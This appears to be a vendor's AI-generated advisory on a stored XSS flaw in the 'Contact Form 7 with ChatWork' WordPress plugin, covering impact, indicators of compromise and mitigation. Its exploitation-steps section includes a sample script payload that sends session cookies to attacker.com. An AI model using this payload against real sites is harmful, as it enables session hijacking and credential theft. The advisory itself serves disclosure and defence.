CVE-2025-13975
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-13975 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Contact Form 7 with ChatWork" plugin for WordPress, affecting all versions up to and including 1.1.0. The flaw exists in the api_token and roomid settings fields due to insufficient input sanitization and output escaping. It was published on December 12, 2025, and assigned a CVSS v3.1 base score of 4.4 (Medium) (Wordfence, Red Hat CVE). Exploitation is limited to multi-site WordPress installations or those where unfiltered_html has been disabled.

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Specifically, the plugin fails to properly sanitize and escape user-supplied values for the api_token and roomid settings before rendering them on the plugin's settings page. An authenticated attacker with administrator-level privileges can save malicious JavaScript payloads into these fields; the scripts then execute in the browser of any user who subsequently visits the settings page (Wordfence, Plugin Source). The attack vector is network-based with high attack complexity and requires high privileges, limiting the practical attack surface.

Impact

Successful exploitation allows an authenticated administrator to persistently inject arbitrary JavaScript that executes in the context of other users' browsers when they access the plugin's settings page. This can lead to session hijacking, credential theft, unauthorized administrative actions, or further compromise of the WordPress site. The confidentiality and integrity impacts are rated low, and there is no direct availability impact; however, in multi-site environments, the blast radius may extend across multiple sub-sites (Wordfence, Red Hat CVE).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-13975. The EPSS score is approximately 0.028% (0.000280), indicating a very low probability of exploitation in the near term (Feedly). The vulnerability requires authenticated administrator-level access and is further constrained to multi-site installations or those with unfiltered_html disabled, significantly reducing the exploitable population. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Identify target: Confirm the target WordPress site is a multi-site installation or has unfiltered_html disabled, and that the "Contact Form 7 with ChatWork" plugin version ≤1.1.0 is active.
  2. Authenticate as administrator: Obtain or use existing administrator credentials to log into the WordPress admin dashboard.
  3. Navigate to plugin settings: Go to the Contact Form 7 with ChatWork plugin settings page within the WordPress admin panel.
  4. Inject malicious payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the api_token or roomid field and save the settings.
  5. Trigger execution: The stored payload executes automatically in the browser of any administrator or privileged user who visits the plugin's settings page, enabling session hijacking or further exploitation (Wordfence, Plugin Source).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unexpected modifications to the Contact Form 7 with ChatWork plugin settings (specifically api_token or roomid fields) by an administrator account.
  • File System: Review plugin settings stored in the WordPress database (wp_options table) for entries containing <script> tags or encoded JavaScript in the cf7cw_api_token or cf7cw_roomid option keys.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting the plugin settings page, potentially carrying cookie or session data in query parameters.
  • Browser/Application: Unexpected JavaScript execution or redirects observed by administrators when accessing the plugin's settings page in the WordPress dashboard.

Mitigation and workarounds

Users should update the "Contact Form 7 with ChatWork" plugin to version 1.1.1 or later, which addresses the insufficient sanitization and output escaping issues (Wordfence). As a temporary workaround, site administrators can deactivate the plugin until patching is feasible. Additionally, restricting administrator access to trusted users and enabling unfiltered_html only where strictly necessary can reduce exposure. Multi-site network administrators should prioritize patching given the broader potential impact across sub-sites.

Community reactions

The vulnerability was discovered and disclosed by Wordfence, which published the advisory on December 12, 2025. No notable broader media coverage, researcher commentary, or significant community discussion has been identified beyond the standard vulnerability disclosure channels (Wordfence).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-15413CRITICAL10
  • link-factory
NoNoAug 13, 2026
CVE-2026-18146HIGH7.2
  • fluentform
NoYesAug 13, 2026
CVE-2026-3639MEDIUM6.4
  • password-protect-page
NoNoAug 13, 2026
CVE-2026-14332MEDIUM5.4
  • ecwid-shopping-cart
NoYesAug 13, 2026
CVE-2026-3835MEDIUM5.3
  • prevent-direct-access
NoYesAug 13, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management